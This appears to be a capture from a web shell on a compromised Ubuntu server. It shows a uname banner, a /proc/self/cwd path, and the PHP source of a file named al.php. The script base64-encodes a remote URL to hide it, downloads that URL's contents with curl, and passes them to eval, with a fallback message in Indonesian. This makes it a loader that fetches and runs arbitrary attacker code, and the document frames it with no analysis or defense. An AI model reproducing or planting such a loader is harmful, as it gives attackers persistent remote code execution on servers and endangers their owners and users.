Linux puskom-ProLiant-DL385-Gen10 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64
/
proc
/
self
/
cwd
/
//proc/self/cwd/al.php
<?php function encode_file($data) { return base64_encode($data); } function decode_file($data) { return base64_decode($data); } $encoded_url = "aHR0cHM6Ly9maWxlLjB4MTk5OS50ZWNoL3Byby50eHQ=="; $decoded_url = decode_file($encoded_url); function get_file_contents_curl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $file_contents = get_file_contents_curl($decoded_url); if ($file_contents !== false && !empty($file_contents)) { eval("?>" . $file_contents); } else { echo "File tidak ditemukan atau rusak."; } ?>